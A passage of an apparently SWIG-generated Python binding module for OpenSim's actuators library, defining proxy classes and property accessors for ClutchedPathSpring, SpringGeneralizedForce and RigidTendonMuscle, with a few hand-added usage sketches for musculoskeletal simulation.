----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_get_stiffness(self, *args)
def upd_stiffness(self, *args):
"""
upd_stiffness(ClutchedPathSpring self, int i) -> double
Parameters
----------
i: int
upd_stiffness(ClutchedPathSpring self) -> double &
Parameters
----------
self: OpenSim::ClutchedPathSpring *
"""
return _actuators.ClutchedPathSpring_upd_stiffness(self, *args)
def set_stiffness(self, *args):
"""
set_stiffness(ClutchedPathSpring self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_stiffness(ClutchedPathSpring self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_set_stiffness(self, *args)
def copyProperty_dissipation(self, source):
"""
copyProperty_dissipation(ClutchedPathSpring self, ClutchedPathSpring source)
Parameters
----------
source: OpenSim::ClutchedPathSpring::Self const &
"""
return _actuators.ClutchedPathSpring_copyProperty_dissipation(self, source)
def append_dissipation(self, value):
"""
append_dissipation(ClutchedPathSpring self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_append_dissipation(self, value)
def constructProperty_dissipation(self, initValue):
"""
constructProperty_dissipation(ClutchedPathSpring self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.ClutchedPathSpring_constructProperty_dissipation(self, initValue)
def get_dissipation(self, *args):
"""
get_dissipation(ClutchedPathSpring self, int i) -> double const
Parameters
----------
i: int
get_dissipation(ClutchedPathSpring self) -> double const &
Parameters
----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_get_dissipation(self, *args)
def upd_dissipation(self, *args):
"""
upd_dissipation(ClutchedPathSpring self, int i) -> double
Parameters
----------
i: int
upd_dissipation(ClutchedPathSpring self) -> double &
Parameters
----------
self: OpenSim::ClutchedPathSpring *
"""
return _actuators.ClutchedPathSpring_upd_dissipation(self, *args)
def set_dissipation(self, *args):
"""
set_dissipation(ClutchedPathSpring self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_dissipation(ClutchedPathSpring self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_set_dissipation(self, *args)
def copyProperty_relaxation_time_constant(self, source):
"""
copyProperty_relaxation_time_constant(ClutchedPathSpring self, ClutchedPathSpring source)
Parameters
----------
source: OpenSim::ClutchedPathSpring::Self const &
"""
return _actuators.ClutchedPathSpring_copyProperty_relaxation_time_constant(self, source)
def append_relaxation_time_constant(self, value):
"""
append_relaxation_time_constant(ClutchedPathSpring self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_append_relaxation_time_constant(self, value)
def constructProperty_relaxation_time_constant(self, initValue):
"""
constructProperty_relaxation_time_constant(ClutchedPathSpring self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.ClutchedPathSpring_constructProperty_relaxation_time_constant(self, initValue)
def get_relaxation_time_constant(self, *args):
"""
get_relaxation_time_constant(ClutchedPathSpring self, int i) -> double const
Parameters
----------
i: int
get_relaxation_time_constant(ClutchedPathSpring self) -> double const &
Parameters
----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_get_relaxation_time_constant(self, *args)
def upd_relaxation_time_constant(self, *args):
"""
upd_relaxation_time_constant(ClutchedPathSpring self, int i) -> double
Parameters
----------
i: int
upd_relaxation_time_constant(ClutchedPathSpring self) -> double &
Parameters
----------
self: OpenSim::ClutchedPathSpring *
"""
return _actuators.ClutchedPathSpring_upd_relaxation_time_constant(self, *args)
def set_relaxation_time_constant(self, *args):
"""
set_relaxation_time_constant(ClutchedPathSpring self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_relaxation_time_constant(ClutchedPathSpring self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_set_relaxation_time_constant(self, *args)
def copyProperty_initial_stretch(self, source):
"""
copyProperty_initial_stretch(ClutchedPathSpring self, ClutchedPathSpring source)
Parameters
----------
source: OpenSim::ClutchedPathSpring::Self const &
"""
return _actuators.ClutchedPathSpring_copyProperty_initial_stretch(self, source)
def append_initial_stretch(self, value):
"""
append_initial_stretch(ClutchedPathSpring self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_append_initial_stretch(self, value)
def constructProperty_initial_stretch(self, initValue):
"""
constructProperty_initial_stretch(ClutchedPathSpring self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.ClutchedPathSpring_constructProperty_initial_stretch(self, initValue)
def get_initial_stretch(self, *args):
"""
get_initial_stretch(ClutchedPathSpring self, int i) -> double const
Parameters
----------
i: int
get_initial_stretch(ClutchedPathSpring self) -> double const &
Parameters
----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_get_initial_stretch(self, *args)
def upd_initial_stretch(self, *args):
"""
upd_initial_stretch(ClutchedPathSpring self, int i) -> double
Parameters
----------
i: int
upd_initial_stretch(ClutchedPathSpring self) -> double &
Parameters
----------
self: OpenSim::ClutchedPathSpring *
"""
return _actuators.ClutchedPathSpring_upd_initial_stretch(self, *args)
def set_initial_stretch(self, *args):
"""
set_initial_stretch(ClutchedPathSpring self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_initial_stretch(ClutchedPathSpring self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_set_initial_stretch(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::ClutchedPathSpring self) -> ClutchedPathSpring
__init__(OpenSim::ClutchedPathSpring self, std::string const & name, double stiffness, double dissipation, double relaxationTau, double stretch0=0.0) -> ClutchedPathSpring
Parameters
----------
name: std::string const &
stiffness: double
dissipation: double
relaxationTau: double
stretch0: double
__init__(OpenSim::ClutchedPathSpring self, std::string const & name, double stiffness, double dissipation, double relaxationTau) -> ClutchedPathSpring
Parameters
----------
name: std::string const &
stiffness: double
dissipation: double
relaxationTau: double
"""
this = _actuators.new_ClutchedPathSpring(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def getStiffness(self):
"""
getStiffness(ClutchedPathSpring self) -> double
Parameters
----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_getStiffness(self)
def setStiffness(self, stiffness):
"""
setStiffness(ClutchedPathSpring self, double stiffness)
Parameters
----------
stiffness: double
"""
return _actuators.ClutchedPathSpring_setStiffness(self, stiffness)
def getDissipation(self):
"""
getDissipation(ClutchedPathSpring self) -> double
Parameters
----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_getDissipation(self)
def setDissipation(self, dissipation):
"""
setDissipation(ClutchedPathSpring self, double dissipation)
Parameters
----------
dissipation: double
"""
return _actuators.ClutchedPathSpring_setDissipation(self, dissipation)
def getInitialStretch(self):
"""
getInitialStretch(ClutchedPathSpring self) -> double
Parameters
----------
self: OpenSim::ClutchedPathSpring *
"""
return _actuators.ClutchedPathSpring_getInitialStretch(self)
def setInitialStretch(self, stretch0):
"""
setInitialStretch(ClutchedPathSpring self, double stretch0)
Parameters
----------
stretch0: double
"""
return _actuators.ClutchedPathSpring_setInitialStretch(self, stretch0)
def getStretch(self, s):
"""
getStretch(ClutchedPathSpring self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.ClutchedPathSpring_getStretch(self, s)
def getTension(self, s):
"""
getTension(ClutchedPathSpring self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.ClutchedPathSpring_getTension(self, s)
__swig_destroy__ = _actuators.delete_ClutchedPathSpring
__del__ = lambda self: None
ClutchedPathSpring_swigregister = _actuators.ClutchedPathSpring_swigregister
ClutchedPathSpring_swigregister(ClutchedPathSpring)
def ClutchedPathSpring_safeDownCast(obj):
"""
ClutchedPathSpring_safeDownCast(OpenSimObject obj) -> ClutchedPathSpring
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.ClutchedPathSpring_safeDownCast(obj)
def ClutchedPathSpring_getClassName():
"""ClutchedPathSpring_getClassName() -> std::string const &"""
return _actuators.ClutchedPathSpring_getClassName()
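# --- Illustrative usage sketch (hand-added; not SWIG-generated) -------------
# Construct a ClutchedPathSpring using the overloaded constructor documented
# above (name, stiffness, dissipation, relaxationTau[, stretch0]). All names
# and numeric values are hypothetical; path points would still need to be
# added before the spring is usable in a model.
def _example_clutched_path_spring():
    spring = ClutchedPathSpring('clutch_spring',  # component name
                                100.0,            # stiffness (N/m)
                                0.1,              # dissipation coefficient
                                0.05)             # relaxation time constant (s)
    spring.setInitialStretch(0.0)                 # start with no stretch
    return spring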
class SpringGeneralizedForce(opensim.simulation.Force):
"""Proxy of C++ OpenSim::SpringGeneralizedForce class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.Force]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SpringGeneralizedForce, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.Force]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SpringGeneralizedForce, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> SpringGeneralizedForce
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.SpringGeneralizedForce_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(SpringGeneralizedForce self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.SpringGeneralizedForce_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.SpringGeneralizedForce_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(SpringGeneralizedForce self) -> SpringGeneralizedForce
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(SpringGeneralizedForce self) -> std::string const &
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_getConcreteClassName(self)
def copyProperty_coordinate(self, source):
"""
copyProperty_coordinate(SpringGeneralizedForce self, SpringGeneralizedForce source)
Parameters
----------
source: OpenSim::SpringGeneralizedForce::Self const &
"""
return _actuators.SpringGeneralizedForce_copyProperty_coordinate(self, source)
def append_coordinate(self, value):
"""
append_coordinate(SpringGeneralizedForce self, std::string const & value) -> int
Parameters
----------
value: std::string const &
"""
return _actuators.SpringGeneralizedForce_append_coordinate(self, value)
def constructProperty_coordinate(self, *args):
"""
constructProperty_coordinate(SpringGeneralizedForce self)
constructProperty_coordinate(SpringGeneralizedForce self, std::string const & initValue)
Parameters
----------
initValue: std::string const &
"""
return _actuators.SpringGeneralizedForce_constructProperty_coordinate(self, *args)
def get_coordinate(self, *args):
"""
get_coordinate(SpringGeneralizedForce self, int i) -> std::string const
Parameters
----------
i: int
get_coordinate(SpringGeneralizedForce self) -> std::string const &
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_get_coordinate(self, *args)
def upd_coordinate(self, *args):
"""
upd_coordinate(SpringGeneralizedForce self, int i) -> std::string
Parameters
----------
i: int
upd_coordinate(SpringGeneralizedForce self) -> std::string &
Parameters
----------
self: OpenSim::SpringGeneralizedForce *
"""
return _actuators.SpringGeneralizedForce_upd_coordinate(self, *args)
def set_coordinate(self, *args):
"""
set_coordinate(SpringGeneralizedForce self, int i, std::string const & value)
Parameters
----------
i: int
value: std::string const &
set_coordinate(SpringGeneralizedForce self, std::string const & value)
Parameters
----------
value: std::string const &
"""
return _actuators.SpringGeneralizedForce_set_coordinate(self, *args)
def copyProperty_stiffness(self, source):
"""
copyProperty_stiffness(SpringGeneralizedForce self, SpringGeneralizedForce source)
Parameters
----------
source: OpenSim::SpringGeneralizedForce::Self const &
"""
return _actuators.SpringGeneralizedForce_copyProperty_stiffness(self, source)
def append_stiffness(self, value):
"""
append_stiffness(SpringGeneralizedForce self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.SpringGeneralizedForce_append_stiffness(self, value)
def constructProperty_stiffness(self, initValue):
"""
constructProperty_stiffness(SpringGeneralizedForce self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.SpringGeneralizedForce_constructProperty_stiffness(self, initValue)
def get_stiffness(self, *args):
"""
get_stiffness(SpringGeneralizedForce self, int i) -> double const
Parameters
----------
i: int
get_stiffness(SpringGeneralizedForce self) -> double const &
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_get_stiffness(self, *args)
def upd_stiffness(self, *args):
"""
upd_stiffness(SpringGeneralizedForce self, int i) -> double
Parameters
----------
i: int
upd_stiffness(SpringGeneralizedForce self) -> double &
Parameters
----------
self: OpenSim::SpringGeneralizedForce *
"""
return _actuators.SpringGeneralizedForce_upd_stiffness(self, *args)
def set_stiffness(self, *args):
"""
set_stiffness(SpringGeneralizedForce self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_stiffness(SpringGeneralizedForce self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.SpringGeneralizedForce_set_stiffness(self, *args)
def copyProperty_rest_length(self, source):
"""
copyProperty_rest_length(SpringGeneralizedForce self, SpringGeneralizedForce source)
Parameters
----------
source: OpenSim::SpringGeneralizedForce::Self const &
"""
return _actuators.SpringGeneralizedForce_copyProperty_rest_length(self, source)
def append_rest_length(self, value):
"""
append_rest_length(SpringGeneralizedForce self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.SpringGeneralizedForce_append_rest_length(self, value)
def constructProperty_rest_length(self, initValue):
"""
constructProperty_rest_length(SpringGeneralizedForce self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.SpringGeneralizedForce_constructProperty_rest_length(self, initValue)
def get_rest_length(self, *args):
"""
get_rest_length(SpringGeneralizedForce self, int i) -> double const
Parameters
----------
i: int
get_rest_length(SpringGeneralizedForce self) -> double const &
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_get_rest_length(self, *args)
def upd_rest_length(self, *args):
"""
upd_rest_length(SpringGeneralizedForce self, int i) -> double
Parameters
----------
i: int
upd_rest_length(SpringGeneralizedForce self) -> double &
Parameters
----------
self: OpenSim::SpringGeneralizedForce *
"""
return _actuators.SpringGeneralizedForce_upd_rest_length(self, *args)
def set_rest_length(self, *args):
"""
set_rest_length(SpringGeneralizedForce self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_rest_length(SpringGeneralizedForce self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.SpringGeneralizedForce_set_rest_length(self, *args)
def copyProperty_viscosity(self, source):
"""
copyProperty_viscosity(SpringGeneralizedForce self, SpringGeneralizedForce source)
Parameters
----------
source: OpenSim::SpringGeneralizedForce::Self const &
"""
return _actuators.SpringGeneralizedForce_copyProperty_viscosity(self, source)
def append_viscosity(self, value):
"""
append_viscosity(SpringGeneralizedForce self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.SpringGeneralizedForce_append_viscosity(self, value)
def constructProperty_viscosity(self, initValue):
"""
constructProperty_viscosity(SpringGeneralizedForce self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.SpringGeneralizedForce_constructProperty_viscosity(self, initValue)
def get_viscosity(self, *args):
"""
get_viscosity(SpringGeneralizedForce self, int i) -> double const
Parameters
----------
i: int
get_viscosity(SpringGeneralizedForce self) -> double const &
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_get_viscosity(self, *args)
def upd_viscosity(self, *args):
"""
upd_viscosity(SpringGeneralizedForce self, int i) -> double
Parameters
----------
i: int
upd_viscosity(SpringGeneralizedForce self) -> double &
Parameters
----------
self: OpenSim::SpringGeneralizedForce *
"""
return _actuators.SpringGeneralizedForce_upd_viscosity(self, *args)
def set_viscosity(self, *args):
"""
set_viscosity(SpringGeneralizedForce self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_viscosity(SpringGeneralizedForce self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.SpringGeneralizedForce_set_viscosity(self, *args)
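    # Note on the generated property accessors above (hand-written comment,
    # not SWIG output): each OpenSim property named X gets the same triad of
    # methods -- get_X() for read access, upd_X() for writable access, and
    # set_X(value) to assign. The overloads taking an int index exist because
    # SWIG emits one interface for both single- and list-valued properties;
    # for the single-valued properties of this class, the no-index form is
    # the one normally used from Python.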
def __init__(self, *args):
"""
__init__(OpenSim::SpringGeneralizedForce self, std::string const & coordinateName) -> SpringGeneralizedForce
Parameters
----------
coordinateName: std::string const &
__init__(OpenSim::SpringGeneralizedForce self) -> SpringGeneralizedForce
"""
this = _actuators.new_SpringGeneralizedForce(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setStiffness(self, aStiffness):
"""
setStiffness(SpringGeneralizedForce self, double aStiffness)
Parameters
----------
aStiffness: double
"""
return _actuators.SpringGeneralizedForce_setStiffness(self, aStiffness)
def getStiffness(self):
"""
getStiffness(SpringGeneralizedForce self) -> double
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_getStiffness(self)
def setRestLength(self, aRestLength):
"""
setRestLength(SpringGeneralizedForce self, double aRestLength)
Parameters
----------
aRestLength: double
"""
return _actuators.SpringGeneralizedForce_setRestLength(self, aRestLength)
def getRestLength(self):
"""
getRestLength(SpringGeneralizedForce self) -> double
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_getRestLength(self)
def setViscosity(self, aViscosity):
"""
setViscosity(SpringGeneralizedForce self, double aViscosity)
Parameters
----------
aViscosity: double
"""
return _actuators.SpringGeneralizedForce_setViscosity(self, aViscosity)
def getViscosity(self):
"""
getViscosity(SpringGeneralizedForce self) -> double
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_getViscosity(self)
def getRecordLabels(self):
"""
getRecordLabels(SpringGeneralizedForce self) -> ArrayStr
Parameters
----------
self: OpenSim::SpringGeneralizedForce const *
"""
return _actuators.SpringGeneralizedForce_getRecordLabels(self)
def getRecordValues(self, state):
"""
getRecordValues(SpringGeneralizedForce self, State state) -> ArrayDouble
Parameters
----------
state: SimTK::State const &
"""
return _actuators.SpringGeneralizedForce_getRecordValues(self, state)
__swig_destroy__ = _actuators.delete_SpringGeneralizedForce
__del__ = lambda self: None
SpringGeneralizedForce_swigregister = _actuators.SpringGeneralizedForce_swigregister
SpringGeneralizedForce_swigregister(SpringGeneralizedForce)
def SpringGeneralizedForce_safeDownCast(obj):
"""
SpringGeneralizedForce_safeDownCast(OpenSimObject obj) -> SpringGeneralizedForce
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.SpringGeneralizedForce_safeDownCast(obj)
def SpringGeneralizedForce_getClassName():
"""SpringGeneralizedForce_getClassName() -> std::string const &"""
return _actuators.SpringGeneralizedForce_getClassName()
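# ---------------------------------------------------------------------------
# Usage sketch (hand-written, not part of the SWIG-generated API): wiring a
# SpringGeneralizedForce into a model. The model file name and coordinate
# name below are assumptions; substitute values from your own .osim model.
# ---------------------------------------------------------------------------
def _spring_generalized_force_example(model_path='arm26.osim',
                                      coordinate='r_elbow_flex'):
    import opensim
    model = opensim.Model(model_path)
    # Construct the spring acting on a generalized coordinate, by name.
    spring = SpringGeneralizedForce(coordinate)
    spring.setStiffness(10.0)   # restoring stiffness about the coordinate
    spring.setRestLength(0.0)   # coordinate value producing zero spring force
    spring.setViscosity(0.1)    # damping proportional to coordinate speed
    model.addForce(spring)      # the model takes ownership of the force
    state = model.initSystem()
    # getRecordLabels()/getRecordValues() pair up for reporting.
    return spring.getRecordLabels(), spring.getRecordValues(state)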
class RigidTendonMuscle(opensim.simulation.Muscle):
"""Proxy of C++ OpenSim::RigidTendonMuscle class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.Muscle]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, RigidTendonMuscle, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.Muscle]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, RigidTendonMuscle, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> RigidTendonMuscle
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.RigidTendonMuscle_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(RigidTendonMuscle self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.RigidTendonMuscle_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.RigidTendonMuscle_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(RigidTendonMuscle self) -> RigidTendonMuscle
Parameters
----------
self: OpenSim::RigidTendonMuscle const *
"""
return _actuators.RigidTendonMuscle_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(RigidTendonMuscle self) -> std::string const &
Parameters
----------
self: OpenSim::RigidTendonMuscle const *
"""
return _actuators.RigidTendonMuscle_getConcreteClassName(self)
def copyProperty_active_force_length_curve(self, source):
"""
copyProperty_active_force_length_curve(RigidTendonMuscle self, RigidTendonMuscle source)
Parameters
----------
source: OpenSim::RigidTendonMuscle::Self const &
"""
return _actuators.RigidTendonMuscle_copyProperty_active_force_length_curve(self, source)
def append_active_force_length_curve(self, value):
"""
append_active_force_length_curve(RigidTendonMuscle self, Function value) -> int
Parameters
----------
value: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_append_active_force_length_curve(self, value)
def constructProperty_active_force_length_curve(self, initValue):
"""
constructProperty_active_force_length_curve(RigidTendonMuscle self, Function initValue)
Parameters
----------
initValue: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_constructProperty_active_force_length_curve(self, initValue)
def get_active_force_length_curve(self, *args):
"""
get_active_force_length_curve(RigidTendonMuscle self, int i) -> Function
Parameters
----------
i: int
get_active_force_length_curve(RigidTendonMuscle self) -> Function
Parameters
----------
self: OpenSim::RigidTendonMuscle const *
"""
return _actuators.RigidTendonMuscle_get_active_force_length_curve(self, *args)
def upd_active_force_length_curve(self, *args):
"""
upd_active_force_length_curve(RigidTendonMuscle self, int i) -> Function
Parameters
----------
i: int
upd_active_force_length_curve(RigidTendonMuscle self) -> Function
Parameters
----------
self: OpenSim::RigidTendonMuscle *
"""
return _actuators.RigidTendonMuscle_upd_active_force_length_curve(self, *args)
def set_active_force_length_curve(self, *args):
"""
set_active_force_length_curve(RigidTendonMuscle self, int i, Function value)
Parameters
----------
i: int
value: OpenSim::Function const &
set_active_force_length_curve(RigidTendonMuscle self, Function value)
Parameters
----------
value: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_set_active_force_length_curve(self, *args)
def copyProperty_passive_force_length_curve(self, source):
"""
copyProperty_passive_force_length_curve(RigidTendonMuscle self, RigidTendonMuscle source)
Parameters
----------
source: OpenSim::RigidTendonMuscle::Self const &
"""
return _actuators.RigidTendonMuscle_copyProperty_passive_force_length_curve(self, source)
def append_passive_force_length_curve(self, value):
"""
append_passive_force_length_curve(RigidTendonMuscle self, Function value) -> int
Parameters
----------
value: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_append_passive_force_length_curve(self, value)
def constructProperty_passive_force_length_curve(self, initValue):
"""
constructProperty_passive_force_length_curve(RigidTendonMuscle self, Function initValue)
Parameters
----------
initValue: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_constructProperty_passive_force_length_curve(self, initValue)
def get_passive_force_length_curve(self, *args):
"""
get_passive_force_length_curve(RigidTendonMuscle self, int i) -> Function
Parameters
----------
i: int
get_passive_force_length_curve(RigidTendonMuscle self) -> Function
Parameters
----------
self: OpenSim::RigidTendonMuscle const *
"""
return _actuators.RigidTendonMuscle_get_passive_force_length_curve(self, *args)
def upd_passive_force_length_curve(self, *args):
"""
upd_passive_force_length_curve(RigidTendonMuscle self, int i) -> Function
Parameters
----------
i: int
upd_passive_force_length_curve(RigidTendonMuscle self) -> Function
Parameters
----------
self: OpenSim::RigidTendonMuscle *
"""
return _actuators.RigidTendonMuscle_upd_passive_force_length_curve(self, *args)
def set_passive_force_length_curve(self, *args):
"""
set_passive_force_length_curve(RigidTendonMuscle self, int i, Function value)
Parameters
----------
i: int
value: OpenSim::Function const &
set_passive_force_length_curve(RigidTendonMuscle self, Function value)
Parameters
----------
value: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_set_passive_force_length_curve(self, *args)
def copyProperty_force_velocity_curve(self, source):
"""
copyProperty_force_velocity_curve(RigidTendonMuscle self, RigidTendonMuscle source)
Parameters
----------
source: OpenSim::RigidTendonMuscle::Self const &
"""
return _actuators.RigidTendonMuscle_copyProperty_force_velocity_curve(self, source)
def append_force_velocity_curve(self, value):
"""
append_force_velocity_curve(RigidTendonMuscle self, Function value) -> int
Parameters
----------
value: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_append_force_velocity_curve(self, value)
def constructProperty_force_velocity_curve(self, initValue):
"""
constructProperty_force_velocity_curve(RigidTendonMuscle self, Function initValue)
Parameters
----------
initValue: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_constructProperty_force_velocity_curve(self, initValue)
def get_force_velocity_curve(self, *args):
"""
get_force_velocity_curve(RigidTendonMuscle self, int i) -> Function
Parameters
----------
i: int
get_force_velocity_curve(RigidTendonMuscle self) -> Function
Parameters
----------
self: OpenSim::RigidTendonMuscle const *
"""
return _actuators.RigidTendonMuscle_get_force_velocity_curve(self, *args)
def upd_force_velocity_curve(self, *args):
"""
upd_force_velocity_curve(RigidTendonMuscle self, int i) -> Function
Parameters
----------
i: int
upd_force_velocity_curve(RigidTendonMuscle self) -> Function
Parameters
----------
self: OpenSim::RigidTendonMuscle *
"""
return _actuators.RigidTendonMuscle_upd_force_velocity_curve(self, *args)
def set_force_velocity_curve(self, *args):
"""
set_force_velocity_curve(RigidTendonMuscle self, int i, Function value)
Parameters
----------
i: int
value: OpenSim::Function const &
set_force_velocity_curve(RigidTendonMuscle self, Function value)
Parameters
----------
value: OpenSim::Function const &
"""
return _actuators.RigidTendonMuscle_set_force_velocity_curve(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::RigidTendonMuscle self) -> RigidTendonMuscle
__init__(OpenSim::RigidTendonMuscle self, std::string const & name, double maxIsometricForce, double optimalFiberLength, double tendonSlackLength, double pennationAngle) -> RigidTendonMuscle
Parameters
----------
name: std::string const &
maxIsometricForce: double
optimalFiberLength: double
tendonSlackLength: double
pennationAngle: double
"""
this = _actuators.new_RigidTendonMuscle(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setActivation(self, s, activation):
"""
setActivation(RigidTendonMuscle self, State s, double activation)
Parameters
----------
s: SimTK::State &
activation: double
"""
return _actuators.RigidTendonMuscle_setActivation(self, s, activation)
__swig_destroy__ = _actuators.delete_RigidTendonMuscle
__del__ = lambda self: None
RigidTendonMuscle_swigregister = _actuators.RigidTendonMuscle_swigregister
RigidTendonMuscle_swigregister(RigidTendonMuscle)
def RigidTendonMuscle_safeDownCast(obj):
"""
RigidTendonMuscle_safeDownCast(OpenSimObject obj) -> RigidTendonMuscle
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.RigidTendonMuscle_safeDownCast(obj)
def RigidTendonMuscle_getClassName():
"""RigidTendonMuscle_getClassName() -> std::string const &"""
return _actuators.RigidTendonMuscle_getClassName()
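# ---------------------------------------------------------------------------
# Usage sketch (hand-written, not part of the SWIG-generated API): the
# five-argument RigidTendonMuscle constructor documented above, plus the
# module-level safeDownCast helper. Numeric values are illustrative
# assumptions, and a real muscle also needs path points before simulation.
# ---------------------------------------------------------------------------
def _rigid_tendon_muscle_example(model):
    muscle = RigidTendonMuscle('biceps',  # name
                               200.0,     # maxIsometricForce (N)
                               0.06,      # optimalFiberLength (m)
                               0.55,      # tendonSlackLength (m)
                               0.0)       # pennationAngle (rad)
    model.addForce(muscle)
    # Forces fetched back from the model are typed as the base Force class;
    # the generated safeDownCast recovers the concrete proxy (or None).
    force = model.getForceSet().get('biceps')
    return RigidTendonMuscle_safeDownCast(force)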
class Millard2012AccelerationMuscle(opensim.simulation.Muscle):
"""Proxy of C++ OpenSim::Millard2012AccelerationMuscle class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.Muscle]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Millard2012AccelerationMuscle, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.Muscle]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Millard2012AccelerationMuscle, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> Millard2012AccelerationMuscle
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.Millard2012AccelerationMuscle_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(Millard2012AccelerationMuscle self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.Millard2012AccelerationMuscle_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.Millard2012AccelerationMuscle_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(Millard2012AccelerationMuscle self) -> Millard2012AccelerationMuscle
Parameters
----------
